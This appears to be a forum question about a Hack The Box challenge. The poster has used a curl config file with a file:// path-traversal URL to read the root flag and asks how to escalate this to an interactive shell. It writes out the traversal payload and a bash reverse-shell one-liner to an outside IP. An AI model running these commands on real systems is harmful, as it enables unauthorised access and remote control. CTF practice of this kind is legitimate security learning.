So I’m doing a HTB challenge where I have leveraged the targets box use of reading a file that sets a url for curl in order to transverse down the directory and display the root flag in a report that is part of the exercise.
File Content: url = file:///127.0.0.1/../../../root/root.txt
All cool.
What I want to do is further leverage this to somehow spawn a shell by reading /bin/bash. I can read garbled version of /bin/bash in the report file but I cant figure how to execute it in a way that will give me an interactive shell.
What can I do in in order to achieve this?
EDIT:
I can create a reverse shell from my current user using bash and the below command, just cant get it to execute as I’d like from ‘within’ curl.
bash -i >& /dev/tcp/192.168.1.10/8080 0>&1
